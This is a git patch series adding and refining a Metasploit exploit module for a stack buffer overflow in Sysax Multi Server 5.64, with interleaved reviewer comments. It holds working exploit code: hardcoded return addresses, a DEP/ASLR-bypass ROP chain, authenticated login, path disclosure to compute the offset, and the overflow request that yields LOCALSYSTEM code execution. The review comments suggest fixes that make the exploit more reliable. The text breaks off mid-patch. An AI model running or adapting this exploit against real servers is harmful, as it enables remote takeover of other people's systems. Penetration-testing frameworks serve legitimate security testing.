From 2f7b5f35afeac081860ceb70f7a7c9d390c0dfc0 Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Sun, 29 Jul 2012 10:40:02 -0400 Subject: [PATCH 1/5] Added Sysax 5.64 Create Folder exploit --- .../windows/http/sysax_create_folder.rb | 183 ++++++++++++++++++ 1 file changed, 183 insertions(+) create mode 100644 modules/exploits/windows/http/sysax_create_folder.rb diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb new file mode 100644 index 0000000000..fe900d7d34 --- /dev/null +++ b/modules/exploits/windows/http/sysax_create_folder.rb 
@@ -0,0 +1,183 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'base64' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Sysax Multi Server 5.64 Create Folder BoF', + 'Description' => %q{ + This module exploits a stack buffer overflow in the create folder function + in Sysax Multi Server 5.64. This issue was fixed in 5.66. + + You must have valid credentials to trigger the vulnerability. Your credentials + must also have the create folder permission and the HTTP option has to be enabled. + This module will log into the server, get your a SID token and then proceed to exploit + the server. Successful exploits result in LOCALSYSTEM access. This exploit works on + XP SP3, and Server 2003 SP1-SP2. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Matt Andreko @mandreko', # discovery & Metasploit module for 5.64 + 'Craig Freyman @cd1zz', # original discovery & Metasploit module for 5.50 + ], + 'Version' => '$Revision:$', + 'References' => + [ + [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], # 5.64 update + [ 'URL', 'http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html' ], # 5.50 post + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x2F", + }, + + 'Targets' => + [ + [ 'Windows XP SP3', + { + 'Rop' => false, + 'Ret' => 0x77c35459, # push esp # ret [sysaxd.exe] + 'Offset' => 701, + } + ], + [ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass', + { + 'Rop' => true, + 'Ret' => 0x77baf605, # pivot + 'Offset' => 701, + 'Nop' => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] + } + ], + ], + 'Privileged' => false, + 'DisclosureDate'=> 'July 29, 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('URI', [false, "URI for Multi Server", '/']), + Opt::RPORT(80), + OptString.new('SysaxUSER', [ true, "Username" ]), + OptString.new('SysaxPASS', [ true, "Password" ]) + ], self.class) + + end + + def target_url + "http://#{rhost}:#{rport}#{datastore['URI']}" + end + + def create_rop_chain() + rop_gadgets = [] + # All rop gadgets generated by mona.py + # Thanks corelanc0d3r for making such a great tool + + if (target == targets[1]) # Windows 2003 + rop_gadgets = + [ + 0x77be3adb, # POP EAX # RETN [msvcrt.dll] + 0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll] + 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll] + 0x41414141, # Filler (compensate) + 0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll] + 0x77bdb896, # POP EBP # RETN [msvcrt.dll] + 0x77be2265, # & push esp # ret [msvcrt.dll] + 0x77bdeebf, # POP EAX # RETN [msvcrt.dll] + 0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx) + 0x77bdfb80, # 
ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] + 0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll] + 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] + 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx) + 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] + 0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll] + 0x77bcc2ee, # POP ECX # RETN [msvcrt.dll] + 0x77befbb4, # &Writable location [msvcrt.dll] + 0x77bbf75e, # POP EDI # RETN [msvcrt.dll] + 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] + 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] + 0x90909090, # nop + 0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll] + ].flatten.pack("V*") + end + + return rop_gadgets + + end + + def exploit + + user = datastore['SysaxUSER'] + pass = datastore['SysaxPASS'] + + #base64 encode the credentials + encodedcreds = Base64.encode64(user+"\x0a"+pass) + creds = "fd="+encodedcreds + + connect + + # Login to get SID value + print_status "Getting SID from #{target_url}" + res = send_request_raw({ + 'method'=> 'POST', + 'uri' => "#{target_url}/scgi?sid=0&pid=dologin", + 'data' => creds + },20) + + #parse response for SID token + sid = res.body.match (/(sid=[A-Z0-9a-z]{40})/) + print_status "Your " + sid.to_s + + buffer = rand_text(target['Offset']) + buffer << [target.ret].pack('V') + + if (target['Rop']) + buffer << [target['Nop']].pack('V')*16 + buffer << create_rop_chain() + end + + buffer << make_nops(15) + buffer << payload.encoded #max 1299 bytes + + #pwnag3 post data + post_data = "scgi?"+sid.to_s+"&pid=mk_folder2_name1.htm HTTP/1.1\r\n" + post_data << "Content-Length: 171\r\n\r\n" + post_data << "-----------------------------1190753071675116720811342231\r\n" + post_data << "Content-Disposition: form-data; name=\"e2\"\r\n\r\n" + post_data << buffer+"\r\n" + post_data << "-----------------------------1190753071675116720811342231--\r\n\r\n" + + referer = "http://"+datastore['RHOST'].to_s+"/scgi?"+sid.to_s+"&pid=mk_folder1_name1.htm" + + 
send_request_raw({ + 'uri' => "/" + post_data, + 'version' => '1.1', + 'method' => 'POST', + 'referer' => referer + }) + + handler + disconnect + + end +end \ No newline at end of file From bd249d1f28988905a99d8757decc6d2deb18fbc7 Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Sun, 19 Aug 2012 10:01:03 -0400 Subject: [PATCH 2/5] Fixed exploit and made code review changes The exploit was not working due to the user's root path causing the EIP offset to change. To correct this, I was able to get the server to disclose the root path in an error message (fixed in 5.67). I also radically refactored the exploit due to the feedback I received from Juan Vazquez. --- .../windows/http/sysax_create_folder.rb | 313 +++++++++--------- 1 file changed, 162 insertions(+), 151 deletions(-) diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb index fe900d7d34..902b344787 100644 --- a/modules/exploits/windows/http/sysax_create_folder.rb +++ b/modules/exploits/windows/http/sysax_create_folder.rb 
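Review bot: The overflow request declares `Content-Length: 171` while the body it carries is `Offset` (701) bytes of padding plus return address, ROP chain and payload, and the rest of the request line and headers are smuggled through the `uri` parameter of send_request_raw as `"/" + post_data`; whether the server reads past the declared length is a parsing quirk the module should not rely on. Pass the multipart body as `'data'` and let the client compute the real Content-Length, and generate the boundary instead of the fixed `-----------------------------1190753071675116720811342231`. Separately, `Base64.encode64` appends a trailing newline, so the `fd=` credential value is sent with a stray `\n`; `Rex::Text.encode_base64(user + "\x0a" + pass)` avoids that and removes the extra `require 'base64'`.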
@@ -10,174 +10,185 @@ ## require 'msf/core' -require 'base64' class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking + Rank = NormalRanking - include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpClient - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Sysax Multi Server 5.64 Create Folder BoF', - 'Description' => %q{ - This module exploits a stack buffer overflow in the create folder function - in Sysax Multi Server 5.64. This issue was fixed in 5.66. + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Sysax Multi Server 5.64 Create Folder Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in the create folder function + in Sysax Multi Server 5.64. This issue was fixed in 5.66. + + You must have valid credentials to trigger the vulnerability. Your credentials + must also have the create folder permission and the HTTP option has to be enabled. + This module will log into the server, get your a SID token, find the root folder, + and then proceed to exploit the server. Successful exploits result in LOCALSYSTEM + access. This exploit works on XP SP3, and Server 2003 SP1-SP2. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Matt "hostess" Andreko', + ], + 'References' => + [ + [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x2F\x0d\x0a", # 0d and 0a are only bad, due to the Rex::MIME replacing 0d with 0d0a in the message#to_s + }, + + 'Targets' => + [ + [ 'Windows XP SP3', + { + 'Rop' => false, + 'Ret' => 0x77c35459, # push esp # ret [sysaxd.exe] + 'Offset' => 711, + } + ], + [ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass', + { + 'Rop' => true, + 'Ret' => 0x77baf605, # pivot + 'Offset' => 711, + 'Nop' => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] + } + ], + ], + 'Privileged' => false, + 'DisclosureDate'=> 'July 29, 2012', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI path to the Sysax web application', '/']), + Opt::RPORT(80), + OptString.new('SysaxUSER', [ true, "Username" ]), + OptString.new('SysaxPASS', [ true, "Password" ]) + ], self.class) - You must have valid credentials to trigger the vulnerability. Your credentials - must also have the create folder permission and the HTTP option has to be enabled. - This module will log into the server, get your a SID token and then proceed to exploit - the server. Successful exploits result in LOCALSYSTEM access. This exploit works on - XP SP3, and Server 2003 SP1-SP2. 
- }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Matt Andreko @mandreko', # discovery & Metasploit module for 5.64 - 'Craig Freyman @cd1zz', # original discovery & Metasploit module for 5.50 - ], - 'Version' => '$Revision:$', - 'References' => - [ - [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], # 5.64 update - [ 'URL', 'http://www.pwnag3.com/2012/01/sysax-multi-server-550-exploit.html' ], # 5.50 post - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Platform' => 'win', - 'Payload' => - { - 'BadChars' => "\x00\x2F", - }, + end + + def create_rop_chain() + rop_gadgets = [] - 'Targets' => - [ - [ 'Windows XP SP3', - { - 'Rop' => false, - 'Ret' => 0x77c35459, # push esp # ret [sysaxd.exe] - 'Offset' => 701, - } - ], - [ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass', - { - 'Rop' => true, - 'Ret' => 0x77baf605, # pivot - 'Offset' => 701, - 'Nop' => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] - } - ], - ], - 'Privileged' => false, - 'DisclosureDate'=> 'July 29, 2012', - 'DefaultTarget' => 0)) + # ROP chains provided by Corelan.be + # https://www.corelan.be/index.php/security/corelan-ropdb/#msvcrtdll_8211_v7037903959_Windows_2003_SP1_SP2 + if (target == targets[1]) # Windows 2003 + rop_gadgets = + [ + 0x77be3adb, # POP EAX # RETN [msvcrt.dll] + 0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll] + 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll] + 0x41414141, # Filler (compensate) + 0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll] + 0x77bdb896, # POP EBP # RETN [msvcrt.dll] + 0x77be2265, # & push esp # ret [msvcrt.dll] + 0x77bdeebf, # POP EAX # RETN [msvcrt.dll] + 0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx) + 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] + 0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll] + 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] + 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx) + 0x77bdfb80, # ADD 
EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] + 0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll] + 0x77bcc2ee, # POP ECX # RETN [msvcrt.dll] + 0x77befbb4, # &Writable location [msvcrt.dll] + 0x77bbf75e, # POP EDI # RETN [msvcrt.dll] + 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] + 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] + 0x90909090, # nop + 0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll] + ].flatten.pack("V*") + end - register_options( - [ - OptString.new('URI', [false, "URI for Multi Server", '/']), - Opt::RPORT(80), - OptString.new('SysaxUSER', [ true, "Username" ]), - OptString.new('SysaxPASS', [ true, "Password" ]) - ], self.class) - - end + return rop_gadgets - def target_url - "http://#{rhost}:#{rport}#{datastore['URI']}" - end + end - def create_rop_chain() - rop_gadgets = [] - # All rop gadgets generated by mona.py - # Thanks corelanc0d3r for making such a great tool + def get_sid - if (target == targets[1]) # Windows 2003 - rop_gadgets = - [ - 0x77be3adb, # POP EAX # RETN [msvcrt.dll] - 0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll] - 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll] - 0x41414141, # Filler (compensate) - 0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll] - 0x77bdb896, # POP EBP # RETN [msvcrt.dll] - 0x77be2265, # & push esp # ret [msvcrt.dll] - 0x77bdeebf, # POP EAX # RETN [msvcrt.dll] - 0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx) - 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] - 0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll] - 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] - 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx) - 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] - 0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll] - 0x77bcc2ee, # POP ECX # RETN [msvcrt.dll] - 0x77befbb4, # &Writable location [msvcrt.dll] - 0x77bbf75e, # POP EDI # RETN [msvcrt.dll] - 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] - 0x77bdf0da, # POP 
EAX # RETN [msvcrt.dll] - 0x90909090, # nop - 0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll] - ].flatten.pack("V*") - end + user = datastore['SysaxUSER'] + pass = datastore['SysaxPASS'] - return rop_gadgets + creds = "fd=#{Rex::Text.encode_base64(user+"\x0a"+pass)}" - end + # Login to get SID value + r = send_request_cgi({ + 'method' => "POST", + 'uri' => "#{target_uri.to_s}scgi?sid=0&pid=dologin", + 'data' => creds + }) - def exploit - - user = datastore['SysaxUSER'] - pass = datastore['SysaxPASS'] - - #base64 encode the credentials - encodedcreds = Base64.encode64(user+"\x0a"+pass) - creds = "fd="+encodedcreds + # Parse response for SID token + sid = r.body.match(/sid=([A-Z0-9a-z]{40})/)[1] + print_status "SID: #{sid.to_s}" - connect + sid.to_s + + end - # Login to get SID value - print_status "Getting SID from #{target_url}" - res = send_request_raw({ - 'method'=> 'POST', - 'uri' => "#{target_url}/scgi?sid=0&pid=dologin", - 'data' => creds - },20) - - #parse response for SID token - sid = res.body.match (/(sid=[A-Z0-9a-z]{40})/) - print_status "Your " + sid.to_s + def get_root_path(sid) - buffer = rand_text(target['Offset']) - buffer << [target.ret].pack('V') + # Find the path because it's used to help calculate the offset + random_folder_name = rand_text_alpha(8) # This folder should not exist in the root dir - if (target['Rop']) - buffer << [target['Nop']].pack('V')*16 - buffer << create_rop_chain() - end + r = send_request_cgi({ + 'uri' => "#{target_uri.to_s}scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm", + 'method' => 'POST', + }) - buffer << make_nops(15) - buffer << payload.encoded #max 1299 bytes - - #pwnag3 post data - post_data = "scgi?"+sid.to_s+"&pid=mk_folder2_name1.htm HTTP/1.1\r\n" - post_data << "Content-Length: 171\r\n\r\n" - post_data << "-----------------------------1190753071675116720811342231\r\n" - post_data << "Content-Disposition: form-data; name=\"e2\"\r\n\r\n" - post_data << buffer+"\r\n" - post_data << 
"-----------------------------1190753071675116720811342231--\r\n\r\n" - - referer = "http://"+datastore['RHOST'].to_s+"/scgi?"+sid.to_s+"&pid=mk_folder1_name1.htm" - - send_request_raw({ - 'uri' => "/" + post_data, - 'version' => '1.1', - 'method' => 'POST', - 'referer' => referer - }) + # Example message: invalid path: C:\Documents and Settings\Administrator\Desktop\9dk2hdh2. + # Root Path should be C:\Documents and Settings\Administrator\Desktop (no trailing slash) + root_path = r.body.match(/^invalid path: (.*)\\#{random_folder_name}\.$/)[1] + print_status "Root Dir: #{root_path}" - handler - disconnect + root_path + + end + + def exploit + + connect + + sid = get_sid + root_path = get_root_path(sid) + + buffer = rand_text(target['Offset']-root_path.length) + buffer << [target.ret].pack('V') + + if (target['Rop']) + buffer << [target['Nop']].pack('V')*16 + buffer << create_rop_chain() + end + + buffer << make_nops(15) + buffer << payload.encoded #max 1299 bytes + + post_data = Rex::MIME::Message.new + post_data.add_part(buffer, nil, nil, "form-data; name=\"e2\"") + post_data.bound = rand_text_numeric(57) # example; "---------------------------12816808881949705206242427669" + + r = send_request_cgi({ + 'uri' => "#{target_uri.to_s}scgi?sid=#{sid}&pid=mk_folder2_name1.htm", + 'method' => 'POST', + 'data' => post_data.to_s, + 'ctype' => "multipart/form-data; boundary=#{post_data.bound}", + }) + + disconnect + + end +end - end -end \ No newline at end of file From d82493a658a1904a66677a7539e99207cb5ad00a Mon Sep 17 00:00:00 2001 From: Matt Andreko Date: Sun, 19 Aug 2012 22:09:08 -0400 Subject: [PATCH 3/5] Code Review Feedback Added 'Space' payload option, which in turn also required 'DisableNops' Added/Corrected documentation for return addresses --- modules/exploits/windows/http/sysax_create_folder.rb | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) 
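Review bot: `get_sid` and `get_root_path` both index the match result directly (`r.body.match(...)[1]`), so a failed login (wrong credentials, an account without the HTTP or create-folder permission) or a timed-out request where send_request_cgi returns nil raises NoMethodError instead of a readable failure. In get_sid I would write `m = r ? r.body.match(/sid=([A-Z0-9a-z]{40})/) : nil`, `fail_with(Exploit::Failure::NoAccess, "Login failed, no SID in response") if m.nil?`, `sid = m[1]`, and guard the root-path match the same way with `Exploit::Failure::UnexpectedReply`. Also note that `rand_text(target['Offset'] - root_path.length)` counts characters, not bytes; if the server ever returns a non-ASCII path (or one longer than 711 characters) the padding length, and hence the return-address position, would be off — worth a comment or a `bytesize` check, though I cannot confirm the response encoding from here.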
diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb index 902b344787..5883e1a5d8 100644 --- a/modules/exploits/windows/http/sysax_create_folder.rb +++ b/modules/exploits/windows/http/sysax_create_folder.rb @@ -45,7 +45,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Platform' => 'win', 'Payload' => { - 'BadChars' => "\x00\x2F\x0d\x0a", # 0d and 0a are only bad, due to the Rex::MIME replacing 0d with 0d0a in the message#to_s + 'BadChars' => "\x00\x2F\x0d\x0a", # 0d and 0a are only bad, due to the Rex::MIME replacing 0d with 0d0a in the message#to_s + 'Space' => '1299', + 'DisableNops' => true, }, 'Targets' => @@ -53,14 +55,14 @@ class Metasploit3 < Msf::Exploit::Remote [ 'Windows XP SP3', { 'Rop' => false, - 'Ret' => 0x77c35459, # push esp # ret [sysaxd.exe] + 'Ret' => 0x77c35459, # push esp # ret [msvcrt.dll] 'Offset' => 711, } ], [ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass', { 'Rop' => true, - 'Ret' => 0x77baf605, # pivot + 'Ret' => 0x77baf605, # pop esi; pop ebp; retn 0c; [msvcrt.dll] (pivot) 'Offset' => 711, 'Nop' => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] } @@ -147,7 +149,7 @@ class Metasploit3 < Msf::Exploit::Remote r = send_request_cgi({ 'uri' => "#{target_uri.to_s}scgi?sid=#{sid}&pid=transferpage2_name1_#{random_folder_name}.htm", 'method' => 'POST', - }) + }) # Example message: invalid path: C:\Documents and Settings\Administrator\Desktop\9dk2hdh2. # Root Path should be C:\Documents and Settings\Administrator\Desktop (no trailing slash) @@ -174,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote end buffer << make_nops(15) - buffer << payload.encoded #max 1299 bytes + buffer << payload.encoded post_data = Rex::MIME::Message.new post_data.add_part(buffer, nil, nil, "form-data; name=\"e2\"") From d226135986250bb8e7eab6612f7912e8bd3ec9d3 Mon Sep 17 00:00:00 2001 
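Review bot: `'Space' => '1299'` in the first hunk is a String, while the framework treats `Space` as an Integer when it checks the encoded payload length against the available room (other modules declare it as a bare number); depending on how that comparison is done a String will either raise or silently skip the bound. Change it to `'Space' => 1299,`. With `DisableNops` set the framework adds no NOP padding of its own, so the manual `make_nops(15)` in exploit is now the only sled — a short comment saying so would help the next reader.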
From: Matt Andreko Date: Mon, 20 Aug 2012 10:41:42 -0400 Subject: [PATCH 4/5] Code Review Feedback Removed trailing spaces and fixed indenting. --- .../windows/http/sysax_create_folder.rb | 307 +++++++++--------- 1 file changed, 153 insertions(+), 154 deletions(-) diff --git a/modules/exploits/windows/http/sysax_create_folder.rb b/modules/exploits/windows/http/sysax_create_folder.rb index 5883e1a5d8..a07189e478 100644 --- a/modules/exploits/windows/http/sysax_create_folder.rb +++ b/modules/exploits/windows/http/sysax_create_folder.rb 
@@ -6,191 +6,190 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. -# http://metasploit.com/ +# http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - Rank = NormalRanking + Rank = NormalRanking - include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::Remote::HttpClient - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Sysax Multi Server 5.64 Create Folder Buffer Overflow', - 'Description' => %q{ - This module exploits a stack buffer overflow in the create folder function - in Sysax Multi Server 5.64. This issue was fixed in 5.66. - - You must have valid credentials to trigger the vulnerability. Your credentials - must also have the create folder permission and the HTTP option has to be enabled. - This module will log into the server, get your a SID token, find the root folder, - and then proceed to exploit the server. Successful exploits result in LOCALSYSTEM - access. This exploit works on XP SP3, and Server 2003 SP1-SP2. 
- }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'Matt "hostess" Andreko', - ], - 'References' => - [ - [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Platform' => 'win', - 'Payload' => - { - 'BadChars' => "\x00\x2F\x0d\x0a", # 0d and 0a are only bad, due to the Rex::MIME replacing 0d with 0d0a in the message#to_s - 'Space' => '1299', - 'DisableNops' => true, - }, - - 'Targets' => - [ - [ 'Windows XP SP3', - { - 'Rop' => false, - 'Ret' => 0x77c35459, # push esp # ret [msvcrt.dll] - 'Offset' => 711, - } - ], - [ 'Windows 2003 SP1-SP2 DEP & ASLR Bypass', - { - 'Rop' => true, - 'Ret' => 0x77baf605, # pop esi; pop ebp; retn 0c; [msvcrt.dll] (pivot) - 'Offset' => 711, - 'Nop' => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] - } - ], - ], - 'Privileged' => false, - 'DisclosureDate'=> 'July 29, 2012', - 'DefaultTarget' => 0)) - - register_options( - [ - OptString.new('TARGETURI', [true, 'The URI path to the Sysax web application', '/']), - Opt::RPORT(80), - OptString.new('SysaxUSER', [ true, "Username" ]), - OptString.new('SysaxPASS', [ true, "Password" ]) - ], self.class) + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Sysax Multi Server 5.64 Create Folder Buffer Overflow', + 'Description' => %q{ + This module exploits a stack buffer overflow in the create folder function + in Sysax Multi Server 5.64. This issue was fixed in 5.66. - end - - def create_rop_chain() - rop_gadgets = [] + You must have valid credentials to trigger the vulnerability. Your credentials + must also have the create folder permission and the HTTP option has to be enabled. + This module will log into the server, get your a SID token, find the root folder, + and then proceed to exploit the server. Successful exploits result in LOCALSYSTEM + access. This exploit works on XP SP3, and Server 2003 SP1-SP2. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Matt "hostess" Andreko', + ], + 'References' => + [ + [ 'URL', 'http://www.mattandreko.com/2012/07/sysax-564-http-remote-buffer-overflow.html' ], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Platform' => 'win', + 'Payload' => + { + 'BadChars' => "\x00\x2F\x0d\x0a", # 0d and 0a are only bad, due to the Rex::MIME replacing 0d with 0d0a in the message#to_s + 'Space' => '1299', + 'DisableNops' => true, + }, - # ROP chains provided by Corelan.be - # https://www.corelan.be/index.php/security/corelan-ropdb/#msvcrtdll_8211_v7037903959_Windows_2003_SP1_SP2 - if (target == targets[1]) # Windows 2003 - rop_gadgets = - [ - 0x77be3adb, # POP EAX # RETN [msvcrt.dll] - 0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll] - 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll] - 0x41414141, # Filler (compensate) - 0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll] - 0x77bdb896, # POP EBP # RETN [msvcrt.dll] - 0x77be2265, # & push esp # ret [msvcrt.dll] - 0x77bdeebf, # POP EAX # RETN [msvcrt.dll] - 0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx) - 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] - 0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll] - 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] - 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx) - 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] - 0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll] - 0x77bcc2ee, # POP ECX # RETN [msvcrt.dll] - 0x77befbb4, # &Writable location [msvcrt.dll] - 0x77bbf75e, # POP EDI # RETN [msvcrt.dll] - 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] - 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] - 0x90909090, # nop - 0x77be6591, # PUSHAD # ADD AL,0EF # RETN [msvcrt.dll] - ].flatten.pack("V*") - end + 'Targets' => + [ + [ 'Windows XP SP3', + { + 'Rop' => false, + 'Ret' => 0x77c35459, # push esp # ret [msvcrt.dll] + 'Offset' => 711, + } + ], + [ 
'Windows 2003 SP1-SP2 DEP & ASLR Bypass', + { + 'Rop' => true, + 'Ret' => 0x77baf605, # pop esi; pop ebp; retn 0c; [msvcrt.dll] (pivot) + 'Offset' => 711, + 'Nop' => 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] + } + ], + ], + 'Privileged' => false, + 'DisclosureDate'=> 'July 29, 2012', + 'DefaultTarget' => 0)) - return rop_gadgets + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI path to the Sysax web application', '/']), + Opt::RPORT(80), + OptString.new('SysaxUSER', [ true, "Username" ]), + OptString.new('SysaxPASS', [ true, "Password" ]) + ], self.class) - end + end - def get_sid + def create_rop_chain() + rop_gadgets = [] - user = datastore['SysaxUSER'] - pass = datastore['SysaxPASS'] + # ROP chains provided by Corelan.be + # https://www.corelan.be/index.php/security/corelan-ropdb/#msvcrtdll_8211_v7037903959_Windows_2003_SP1_SP2 + if (target == targets[1]) # Windows 2003 + rop_gadgets = + [ + 0x77be3adb, # POP EAX # RETN [msvcrt.dll] + 0x77ba1114, # ptr to &VirtualProtect() [IAT msvcrt.dll] + 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN [msvcrt.dll] + 0x41414141, # Filler (compensate) + 0x77bb0c86, # XCHG EAX,ESI # RETN [msvcrt.dll] + 0x77bdb896, # POP EBP # RETN [msvcrt.dll] + 0x77be2265, # & push esp # ret [msvcrt.dll] + 0x77bdeebf, # POP EAX # RETN [msvcrt.dll] + 0x2cfe0668, # put delta into eax (-> put 0x00000201 into ebx) + 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] + 0x77bdfe37, # ADD EBX,EAX # OR EAX,3000000 # RETN [msvcrt.dll] + 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] + 0x2cfe04a7, # put delta into eax (-> put 0x00000040 into edx) + 0x77bdfb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] + 0x77bb8285, # XCHG EAX,EDX # RETN [msvcrt.dll] + 0x77bcc2ee, # POP ECX # RETN [msvcrt.dll] + 0x77befbb4, # &Writable location [msvcrt.dll] + 0x77bbf75e, # POP EDI # RETN [msvcrt.dll] + 0x77bd7d82, # RETN (ROP NOP) [msvcrt.dll] + 0x77bdf0da, # POP EAX # RETN [msvcrt.dll] + 0x90909090, # nop + 
